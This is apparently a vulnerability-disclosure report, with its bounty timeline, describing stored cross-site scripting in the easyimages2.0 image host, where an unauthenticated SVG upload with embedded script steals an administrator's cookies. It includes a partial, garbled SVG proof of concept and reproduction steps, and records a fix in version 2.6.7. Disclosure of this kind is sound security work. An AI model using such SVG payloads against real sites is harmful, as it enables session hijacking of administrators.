Storage xss vulnerability exists in simple graph beds in icret/easyimages2.0


Reported on

Mar 2nd 2023


Storage xss vulnerability exists in simple graph beds,By constructing a malicious svg code that directs the administrator to click, the cookie is stolen

Proof of Concept

Make the svg file as follows

<? xml version="1.0" standalone="no"? >
<! DOCTYPE SVG PUBLIC "- / / / / W3C DTD SVG 1.1 / / EN" "" >

< SVG version = "1.1" baseProfile = "full" XMLNS = "" >
<rect width="300" height="100" style="fill:rgb(0,0,255); stroke-width:3; stroke:rgb(0,0,0)" />
<script type="text/javascript">

You can steal administrator cookies,No login required to upload svg files on the home page,Then the proof talks about administrator cookies,Set up a local environment and log in as an administrator 2 Upload the svg xss payload we constructed to the graph bed system 3 If yes, xss cookie theft will be triggered 4 Successfully get cookie 5


Steal or tamper with application cookies for session hijacking

We are processing your report and will contact the icret/easyimages2.0 team within 24 hours. a year ago
We have contacted a member of the icret/easyimages2.0 team and are waiting to hear back a year ago
NCNIPC梅苑 modified the report
a year ago
icret validated this vulnerability a year ago

Thank you for your feedback. I hope you can continue to pay attention to the code. Thanks again!

xulei1112 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a year ago


This bug has been fixed in the new version can I apply a CVE number

a year ago



icret marked this as fixed in 2.6.7 with commit 95a6ca a year ago
icret has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation